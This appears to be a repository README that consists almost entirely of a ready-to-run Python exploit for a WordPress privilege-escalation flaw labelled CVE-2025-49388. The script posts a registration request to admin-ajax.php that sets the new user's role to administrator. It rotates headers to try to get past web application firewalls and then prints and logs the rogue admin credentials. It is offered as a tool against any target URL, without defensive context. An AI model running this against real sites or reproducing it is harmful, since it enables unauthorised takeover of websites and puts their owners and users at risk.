README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By Khaled ALenazi ( Nxploited )
# Requires: requests, colorama
# Install: pip install requests colorama
import sys
if sys.version_info[0] < 3:
print("This script requires Python 3.x!")
sys.exit(1)
try:
from colorama import Fore, Style, init
init(autoreset=True)
except ImportError:
class Dummy:
RESET = RED = GREEN = YELLOW = CYAN = ''
Fore = Style = Dummy()
import argparse
import requests
import random
import string
import time
import urllib3
import socket
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def Nxploited_generate_headers():
agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
"Mozilla/5.0 (X11; Linux x86_64) Nxploited",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
"Nxploited/1.0 (compatible;)",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Nxploited"
]
cookies = f"NxploitedID={Nxploited_random_string(16)}"
return {
"User-Agent": random.choice(agents),
"Accept": "*/*",
"Connection": "close",
"Referer": "https://google.com/Nxploited",
"X-Requested-With": "XMLHttpRequest",
"Nxploited-By": "Nxploited",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": cookies,
"Cache-Control": "no-cache",
"Pragma": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Origin": "Nxploited"
}
def Nxploited_random_string(length=8):
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for _ in range(length))
def Nxploited_build_payload(username, full_name, useremail, password):
return {
"action": "miraculous_user_register_form",
"username": username,
"full_name": full_name,
"useremail": useremail,
"password": password,
"confirmpass": password,
"roleusers": "administrator"
}
def Nxploited_extract_host_port(url):
host_port = url.split("/")[2]
# IPv6
if host_port.startswith("["):
match = re.match(r"^\[([^\]]+)\](?::(\d+))?$", host_port)
if match:
host = match.group(1)
port = int(match.group(2)) if match.group(2) else (443 if url.startswith("https") else 80)
else:
host = host_port
port = 443 if url.startswith("https") else 80
elif ":" in host_port:
host, port = host_port.rsplit(":", 1)
try:
port = int(port)
except ValueError:
port = 443 if url.startswith("https") else 80
else:
host = host_port
port = 443 if url.startswith("https") else 80
return host, port
def Nxploited_check_network(host, port=80, timeout=5):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.close()
return True
except Exception:
return False
def Nxploited_safe_request(url, data, headers, retries=5, timeout=12):
for attempt in range(retries):
try:
session = requests.Session()
session.max_redirects = 10
resp = session.post(
url,
data=data,
headers=headers,
timeout=timeout,
verify=False,
allow_redirects=True
)
if resp.status_code in [403, 406, 429]:
Nxploited_print_status(f"Possible WAF detected (HTTP {resp.status_code}), attempt bypass...", warn=True)
headers["Nxploited-Bypass"] = Nxploited_random_string(12)
time.sleep(1)
continue
return resp
except requests.exceptions.TooManyRedirects:
Nxploited_print_status("Too many redirects, retrying with new session.", warn=True)
continue
except requests.exceptions.Timeout:
Nxploited_print_status("Timeout, increasing wait and retrying.", warn=True)
time.sleep(3 + attempt)
continue
except requests.exceptions.RequestException as e:
Nxploited_print_status(f"Attempt {attempt+1}: {str(e)}", warn=True)
time.sleep(2 + attempt)
Nxploited_print_status("All connection attempts failed.", error=True)
sys.exit(1)
def Nxploited_print_status(msg, success=False, warn=False, error=False):
prefix = "[Nxploited INFO]"
color = Fore.WHITE
if success:
prefix = "[Nxploited SUCCESS]"
color = Fore.GREEN
elif warn:
prefix = "[Nxploited WARNING]"
color = Fore.YELLOW
elif error:
prefix = "[Nxploited ERROR]"
color = Fore.RED
print(f"{color}{prefix} {msg}{Style.RESET_ALL}")
def Nxploited_check_success(response_text):
if 'You are successfully registered' in response_text:
Nxploited_print_status("Exploitation succeeded! Nxploited By Nxploited", success=True)
return True
Nxploited_print_status("Exploit attempt failed or protection in place.", error=True)
print(Fore.YELLOW + "[Nxploited DEBUG] Response Body:\n" + response_text + Style.RESET_ALL)
return False
def Nxploited_show_credentials(username, password, useremail):
print(Fore.CYAN + "\n[Nxploited CREDENTIALS]" + Style.RESET_ALL)
print(Fore.CYAN + f"Username : {username}")
print(Fore.CYAN + f"Password : {password}")
print(Fore.CYAN + f"Email : {useremail}" + Style.RESET_ALL)
def Nxploited_log_to_file(filename, msg):
try:
with open(filename, "a", encoding="utf-8") as logf:
logf.write(msg + "\n")
except Exception:
pass
def Nxploited_main():
parser = argparse.ArgumentParser(description="CVE-2025-49388 (Nxploited Edition)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
parser.add_argument("-un", "--username", default="Nxploited_admin", help="Username to register (default: Nxploited_admin)")
parser.add_argument("-fn", "--full_name", default="Nxploited", help="Full name (default: Nxploited)")
parser.add_argument("-em", "--useremail", default="[email protected]", help="Email (default: [email protected])")
parser.add_argument("-pw", "--password", default="Str0ng!Pass123", help="Password (default: Str0ng!Pass123)")
parser.add_argument("-o", "--output", default=None, help="Write results and log to this file")
args = parser.parse_args()
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
if not args.url.startswith('http'):
Nxploited_print_status("URL must start with http or https.", error=True)
sys.exit(1)
target = args.url.rstrip("/") + "/wp-admin/admin-ajax.php"
host, port = Nxploited_extract_host_port(args.url)
if not Nxploited_check_network(host, port):
Nxploited_print_status(f"Host not reachable ({host}:{port}). Check your network or target address.", error=True)
sys.exit(1)
headers = Nxploited_generate_headers()
data = Nxploited_build_payload(args.username, args.full_name, args.useremail, args.password)
Nxploited_print_status(f"Target: {target}")
Nxploited_print_status("Starting exploitation attempt...")
response = Nxploited_safe_request(target, data, headers)
if Nxploited_check_success(response.text):
Nxploited_show_credentials(args.username, args.password, args.useremail)
if args.output:
Nxploited_log_to_file(args.output, f"[SUCCESS]\nUsername: {args.username}\nPassword: {args.password}\nEmail: {args.useremail}\n")
else:
Nxploited_print_status("Target might be patched, protected, or blocking requests.", warn=True)
if args.output:
Nxploited_log_to_file(args.output, "[FAILED] Target might be patched/protected.\n")
if __name__ == "__main__":
try:
Nxploited_main()
except Exception as ex:
Nxploited_print_status(f"Unexpected error: {ex}", error=True)
sys.exit(1)